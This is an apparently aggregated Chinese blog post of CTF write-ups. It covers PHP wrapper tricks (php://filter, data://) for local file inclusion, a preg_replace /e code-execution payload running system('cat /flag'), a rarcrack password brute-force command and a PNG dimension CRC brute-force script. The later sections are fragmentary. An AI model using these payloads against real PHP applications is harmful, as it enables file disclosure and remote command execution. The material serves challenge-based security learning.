对于想了解[BJDCTF2020]ZJCTF，不过如此php伪协议，preg_replace()函数/e模式的读者，本文将提供新的信息，并且为您提供关于ACTF2020新生赛include-PHP伪协

对于想了解[BJDCTF2020]ZJCTF，不过如此 php伪协议， preg_replace() 函数/e模式的读者，本文将提供新的信息，并且为您提供关于ACTF2020新生赛 include-PHP伪协议、BUUCTF——[BJDCTF2020]Easy MD5 1、CTF-Misc-[BJDCTF2020]just_a_rar、CTF-Misc-[BJDCTF2020]一叶障目的有价值信息。

• [BJDCTF2020]ZJCTF，不过如此 php伪协议， preg_replace() 函数/e模式
• ACTF2020新生赛 include-PHP伪协议
• BUUCTF——[BJDCTF2020]Easy MD5 1
• CTF-Misc-[BJDCTF2020]just_a_rar
• CTF-Misc-[BJDCTF2020]一叶障目

[BJDCTF2020]ZJCTF，不过如此 php伪协议， preg_replace() 函数/e模式

转自https://www.cnblogs.com/gaonuoqi/p/12499623.html

题目给了源码

<?PHP

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not Now!");
    }

    include($file);  //next.PHP
    
}
else{
    highlight_file(__FILE__);
}
?>

绕过限制，首先用PHP://input伪协议或着用data伪协议读取I have a dream，然后用filter伪协议读取next.PHP

?text=data://text/plain,I have a dream&file=PHP://filter/convert.base64-encode/resource=next.PHP

获取next.PHP的源码

<?PHP
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
    @eval($_GET['cmd']);
}

preg_replace存在/e的命令执行漏洞  看了一下这篇文章的讲解

构造payload

?\S*=${getFlag()}&cmd=system('cat /flag');

ACTF2020新生赛 include-PHP伪协议

PHP伪协议是什么

PHP伪协议（PHP pseudo-protocols）是一种PHP编程语言中的特殊功能，它允许开发者通过URL或文件路径来访问和处理各种数据源，包括文件、网络资源和其他数据。

PHP伪协议怎么用

这些伪协议在URL中以一种类似于标准协议（如HTTP、FTP等）的方式出现

PHP伪协议原理是什么

PHP解释器会处理不同的伪协议，并将它们映射到适当的处理程序和资源，过程为

1. URL解析：当PHP脚本中包含一个使用伪协议的URL时，PHP解释器首先会解析这个URL，识别伪协议的部分（例如php://、file://等）以及相关的路径和参数。
2. 伪协议处理器：一旦解析了伪协议，PHP解释器会确定要使用的伪协议处理器。每个伪协议都有对应的处理器，负责处理该伪协议所代表的操作。例如，file伪协议处理器用于处理本地文件，http伪协议处理器用于处理HTTP请求，等等。
3. 资源访问：伪协议处理器会根据URL中的信息执行相应的操作，例如，如果是读取文件，它会打开文件并返回文件内容；如果是HTTP请求，它会发送HTTP请求并返回响应内容。
4. 流操作：对于php://伪协议，它允许对PHP的输入和输出流进行操作。例如，php://stdin用于读取标准输入，php://stdout用于写入标准输出。这对于命令行脚本和程序的输入输出非常有用。

解题

打开题目，只有一个超链接

点击超链接 链接为http://e816c4f7-9a29-4114-86c7-aad0b0a91003.node4.buuoj.cn:81/?file=flag.php
通过file参数访问flag.php这个文件，然后将文件内容显示在网页上
页面内容只有一句话Can you find out the flag?但是flag应该就在这个文件里了，只是因为某种原因显示不出来
用php伪协议php://来指定用base64编码输出文件内容（php伪协议允许对PHP的输入和输出流就行处理 包括编码）
payload=file=php://filter/read=convert.base64-encode/resource=flag.php

得到一串base64编码字符串PD9waHAKZWNobyAiQ2FuIHlvdSBmaW5kIG91dCB0aGUgZmxhZz8iOwovL2ZsYWd7NDg5MzhlNjMtMTdmYi00NjdkLTk5MzQtNGVmZWY4MDJjNDVkfQo=
解密后得到

<?php
echo "Can you find out the flag?";
//flag{48938e63-17fb-467d-9934-4efef802c45d}

得到flag=flag{48938e63-17fb-467d-9934-4efef802c45d}

当url=http://e816c4f7-9a29-4114-86c7-aad0b0a91003.node4.buuoj.cn:81/?file=flag.php
PHP处理器会执行php中的代码，所以显示的是Can you find out the flag?

但是当url=http://e816c4f7-9a29-4114-86c7-aad0b0a91003.node4.buuoj.cn:81/?file=php://filter/read=convert.base64-encode/resource=flag.php
PHP无法执行这串被编码的字符，就会直接输出

BUUCTF——[BJDCTF2020]Easy MD5 1

<?PHP
	$a = '123';
	echo md5($a,true);
?>

sudo apt-get install rarcrack

rarcrack  --type  rar  --threads  10 xxx.rar  

#coding=utf-8
import zlib
import struct
#读文件
file = ''1.png''  #注意，1.png图片要和脚本在同一个文件夹下哦~
fr = open(file,''rb'').read()
data = bytearray(fr[12:29])
crc32key = eval(str(fr[29:33]).replace(''\\x'','''').replace("b''",''0x'').replace("''",''''))
#crc32key = 0xCBD6DF8A #补上0x，copy hex value
#data = bytearray(b''\x49\x48\x44\x52\x00\x00\x01\xF4\x00\x00\x01\xF1\x08\x06\x00\x00\x00'')  #hex下copy grep hex
n = 4095 #理论上0xffffffff,但考虑到屏幕实际，0x0fff就差不多了
for w in range(n):#高和宽一起爆破
    width = bytearray(struct.pack(''>i'', w))#q为8字节，i为4字节，h为2字节
    for h in range(n):
        height = bytearray(struct.pack(''>i'', h))
        for x in range(4):
            data[x+4] = width[x]
            data[x+8] = height[x]
            #print(data)
        crc32result = zlib.crc32(data)
        if crc32result == crc32key:
            print(width,height)
            #写文件
            newpic = bytearray(fr)
            for x in range(4):
                newpic[x+16] = width[x]
                newpic[x+20] = height[x]
            fw = open(file+''.png'',''wb'')#保存副本
            fw.write(newpic)
            fw.close

python3 png.py